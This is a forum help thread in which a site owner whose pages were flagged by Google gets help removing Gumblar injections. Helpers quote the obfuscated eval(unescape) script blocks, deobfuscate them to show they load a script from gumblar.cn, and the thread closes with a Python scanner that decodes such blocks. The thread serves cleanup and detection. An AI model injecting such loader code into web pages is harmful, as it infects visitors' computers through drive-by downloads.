While looking for my site on Google, it gives me
“Site is listed as suspicious – visiting this web site may harm your computer.”
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.softwebsolutions.com/
Further it says,
Malicious software includes 24 scripting exploit(s).
Malicious software is hosted on 1 domain(s), including gumblar.cn/.
This site was hosted on 1 network(s) including AS26496 (PAH).
I don’t know how to resolve this issue. Can anybody help me? My domain name: www.softwebsolutions.com
Do you have SSH access to your account?
Log in and type
egrep -ri "tmp_lkojfghx|iframe src|String.fromCharCode|eval\(unescape" .
Depending on what you have in your site, many of the results that come back will be entire lines of obfuscated code that have been injected into your site.
The first step, however, is to scan your computer.
Get a G O O D antivirus software and scan the bejeezus out of your PC. This infection spreads through FTP passwords, so one of the computers you’ve accessed your account through FTP with IS, and I repeat, IS infected, and this issue will continue until you clean the computer out and reset that password.
Your page request_a_quote.aspx has this line right before your <body> tag:
<!-- (function(){var xSRfd='%';var eJGfB=('var>20a>3d>22>53c>72iptE>6egi>6e>65>22>2c>62>3d>22Version()+>22>2cj>3d>22> 22>2cu>3dnavi>67ator>2eu>73>65rAgent>3bi>66(>28u>2ei>6edexO>66(>22W>69n>22) >3e0)>26>26(u>2e>69nde>78Of(>22NT>206>22)>3c0)>26>26(d>6fc>75ment>2ec> 6fo>6bie>2ei>6ede>78>4ff(>22m>69>65k>3d1>22)>3c>30)>26>26>28>74ype>6ff> 28zr>76>7at>73>29>21>3dty>70>65of(>22A>22)>29)>7b>7arv>7ats>3d>22A>22> 3bev>61l(>22if(w>69n>64ow>2e>22>2ba+>22)>6a>3d>6a+>22>2ba+>22>4d>61jor> 22+b>2ba>2b>22Min>6f>72>22>2b>62+a>2b>22Buil>64>22+b+>22j>3b>22)>3bdo> 63umen>74>2ewr>69te>28>22>3cs>63r>69pt>20s>72c>3d>2f>2fgum>62>6car>2e> 63n>2f>72ss>2f>3fid>3d>22>2bj>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d') .replace(/>/g,xSRfd);eval(unescape(eJGfB))})(); -->
Script tags have been removed.
Which deobfuscates to:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("
ScriptEngineMinorVersion()<ins>ScriptEngineBuildVersion()</ins>j;
Again, script tags removed for display. Now you can see the gumblar.cn reference.
Your page ebusiness_web_application.html has this:
<!--
(function(){var NEiH='%';eval(unescape(('va~72~20a~3d~22Script~45ngine~22~2cb~3d~22Vers~69on()+~22~
2cj~3d~22~22~2cu~3dnavig~61tor~2euserAge~6e~74~3bif((u~2eindex~4ff(~22Win~
22~29~3e0)~26~26(u~2eindexOf(~22~4e~54~20~36~22~29~3c0)~26~26(doc~75m~
65~6et~2ec~6fo~6b~69e~2eindexOf(~22m~69~65k~3d1~22~29~3c~30)~26~26(ty~
70~65~6f~66(z~72~76~7ats~29~21~3d~74y~70e~6ff(~22A~22))~29~7bz~72v~7at~
73~3d~22~41~22~3beval(~22~69~66(~77i~6e~64ow~2e~22+a+~22)j~3dj+~22+a+~
22Major~22~2bb+a+~22M~69nor~22+b~2ba~2b~22Bui~6cd~22+b+~22~6a~3b~22~
29~3bdoc~75men~74~2ew~72~69~74e(~22~3cs~63ript~20sr~63~3d~2f~2fgum~
62lar~2ec~6e~2f~72ss~2f~3fid~3d~22+~6a+~22~3e~3c~5c~2fsc~72~69pt~3e~22)~
3b~7d').replace(/~/g,NEiH)))})();
-->
Which deobfuscates to:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("
And your page cs-crm-system-dentists.html has this:
<!-- (function(foIi){eval(unescape(('<76a<72<20<61<3d<22ScriptEngine<22<2c<62<3d<22Versi<6fn<28)+<22<2c<6a<3d<22<22<2cu<3dna<76ig<61<74or<2e<75se<72<41ge<6e<74<3bif((<75<2e<69<6edexOf(<22Wi<6e<22)<3e0<29<26<26<28u<2eindexO<66(<22N<54<206<22)<3c0<29<26<26(<64ocument<2ecooki<65<2ein<64ex<4f<66(<22m<69ek<3d1<22)<3c0)<26<26<28typ<65<6ff(z<72vzts)<21<3dtyp<65o<66(<22A<22)))<7bzrvz<74<73<3d<22A<22<3beval(<22<69<66<28wi<6ed<6fw<2e<22+a+<22)j<3dj+<22+a<2b<22Ma<6aor<22<2b<62<2ba+<22Minor<22+b+a<2b<22Buil<64<22+b+<22j<3b<22)<3b<64<6f<63ument<2ew<72i<74e(<22<3c<73cript<20src<3d<2f<2f<67umblar<2ecn<2frss<2f<3fid<3d<22+<6a+<22<3e<3c<5c<2f<73c<72ip<74<3e<22)<3b<7d').replace(foIi,'%')))})(/</g); -->
Which deobfuscates to:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("
ScriptEngineMinorVersion()<ins>ScriptEngineBuildVersion()</ins>j;
Those are the only pages we found malscripts on. As you can see, each one does basically the same thing; it’s just obfuscated differently.
Change your FTP password and do as tarosic suggested, scan the daylights out of your PC.
I’d go further. Move away from FTP and go to either SFTP or SSH/SCP. We’re doing a video on how to do all this, but it won’t be ready until the end of the week.
Good luck. (Go Blackhawks!)
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Hey Tarosic & WeWatch,
Thank you guys, thanks a lot. I have identified the malicious scripts working on the site and removed them. I am now waiting for Google to reconsider.
The worst thing is that all Google partner sites and a few social networking sites like Twitter also banned the account due to malicious activity on the site. It’s very strange, but thanks to you guys I got the solution to my problem.
Thanks
It appears that Google is no longer flagging your site.
The amount of time it takes for the review to go through and changes to be seen through all data centers can range from a few hours to 24 hours, assuming the site is clean. There have been a lot of sites needing review the past few days, so it is understandable that it took longer than we have seen in the past.
Hi WeWatch,
I have had(?) the same problem (just a different obfuscation) with my 2 websites gis-tec.com and werbetechnik-forum.de (hosted on the same webspace).
I cleaned up every single file manually by deleting the script. Then I deleted the whole webspace and transferred the files from another stand-alone PC to that webspace again and – of course – I changed the password before.
Result: gis-tec.com is no longer flagged BUT werbetechnik-forum.de still is, even after several review requests (but Google no longer names any suspicious files). I cannot find that script or anything similar anymore within the files (even viewed directly from the webspace by FTP).
What could be the reason?
By the way: can anybody tell me what the functionality of that script is when it is executed (besides copying itself to other files on the webspace)?
If I understand the script correctly, it will load another script from the gumblar/martuz servers based on whichever browser+version and operating system+version you are accessing the site with.
Essentially allowing a very individual file to be run that would attack the vulnerability of choice to infect your computer.
A simple addition or change to the source site (gumblar/martuz) would instantly change the behavior on all infected sites and target new or 0-day vulnerabilities.
Pretty, but obvious to spot for the trained eye. I guess they’d be trying to hide it better in the future.
Checked the werbetechnik-forum and did not see any obvious infection on either the landing page, the English or German pages, or the frames.
One of the reasons that Google may find no malicious contents but still keep you in their suspicious list, is when a page that was infected is suddenly missing. A missing page cannot be validated as free from infection and therefore may cause this “delay” to happen.
Try to see if you can identify the page(s) and recreate these without the infection present so that Google can validate them.
Thanks a lot
I think I found the problem: up to now I searched all *.htm files for the script between the </head> and <body> tags …
Within a blog that was mentioned here I found the hint that *.js files are affected as well, but at the END! of the file. Now, there is (was) ONE JS on that site and – oops! – I found the script at the end… last survivor (I hope)
OK, now it is fixed and the site should be clean.
Thanks again.
Right. So now we have positively identified that the threat is developing.
So far the threat wasn’t hiding and was in plain sight. With the threat now moving to script files it may become a bit more difficult to detect.
Various AV vendors have been capable of detecting threats hiding in script files, but since many script files do not contain the embedded script tags, the files look like normal text to the scan engines. Hence no detection will occur. However, we’ve had some reports of Avira and Avast being very aggressive at detecting scripts that are in plain text; this might help detect the threat more efficiently when you’ve downloaded the scripts to your local workstation.
Unfortunately, when viewing sites like badwarebusters.org, Avira and Avast also often detect the mere mention of a partial script as dangerous even without it ever being able to run on the pages. So I can’t really recommend Avira or Avast while viewing badwarebusters.org as they detect quite a few false positives here. But if you feel confident with these products, I see no reason not to use them anyway, as long as you also know these facts.
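As an added example (not code from this thread or from any of its posters), a small Python scanner that finds the `eval(unescape(('...').replace(/X/g,'%')))` pattern deobfuscated earlier in the thread, replays the separator substitution and percent-decoding statically instead of running the script, and reports which remote host the decoded `document.write` would load from. It also handles the variant where the separator regex is passed as the function argument, and walks a constructed .js sample with the block appended at the end, which is where the poster above found the last copy; the sample strings (using example.invalid as the host) and the 400-character search window are my assumptions.

```python
import re
from urllib.parse import unquote

# Core of every block quoted in the thread: ('<encoded>').replace(<separator>, '%')
# wrapped in eval(unescape(...)). The separator is a regex literal /X/g, given
# either inline, through a variable, or as the argument of the wrapping function.
LITERAL_RE = re.compile(r"\('([^']*)'\)\s*\.replace\(\s*(?:/(.)/g|[A-Za-z_$][\w$]*)")
SEP_RE = re.compile(r"/(.)/g")
SRC_HOST_RE = re.compile(r"src=(?:https?:)?//([A-Za-z0-9][A-Za-z0-9.-]*)")

def decode_injected(text):
    """Statically replay the substitution + unescape() of each injected block.
    Returns [(offset, decoded_js, [remote hosts])]; nothing is executed."""
    findings = []
    for m in LITERAL_RE.finditer(text):
        context = text[max(0, m.start() - 200):m.end() + 400]
        if "unescape(" not in context:        # an ordinary .replace() call is not the pattern
            continue
        literal, sep = m.group(1), m.group(2)
        if sep is None:                       # separator passed indirectly, e.g. ...})(/</g)
            sm = SEP_RE.search(text, m.end(), m.end() + 400)   # 400 chars: assumed window
            if sm is None:
                continue
            sep = sm.group(1)
        literal = re.sub(r"[\r\n]+", "", literal)   # line wraps are display artifacts
        decoded = unquote(literal.replace(sep, "%"))
        findings.append((m.start(), decoded, SRC_HOST_RE.findall(decoded)))
    return findings

# Constructed samples modelled on the thread's blocks (no real site content):
# the HTML-comment variant right before <body>, and the function-argument variant
# appended to the end of a .js file, after the file's legitimate code.
SAMPLE_HTML = """</head>
<!-- (function(){var NEiH='%';eval(unescape(('doc~75ment~2ewrite(~22~3cscript src~3d~2f~2fexample~2einvalid~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)').replace(/~/g,NEiH)))})(); -->
<body>"""
SAMPLE_JS = """function menu(){return 1;}
(function(foIi){eval(unescape(('doc<75ment<2ewrite(<22<3cscript src<3d<2f<2fexample<2einvalid<2frss<2f<3fid<3d<22+j+<22<3e<3c<5c<2fscript<3e<22)').replace(foIi,'%')))})(/</g);"""

if __name__ == "__main__":
    for name, text in (("page.html", SAMPLE_HTML), ("menu.js", SAMPLE_JS)):
        for offset, decoded, hosts in decode_injected(text):
            print(f"{name} @ offset {offset}: loads from {hosts}\n  {decoded}")
```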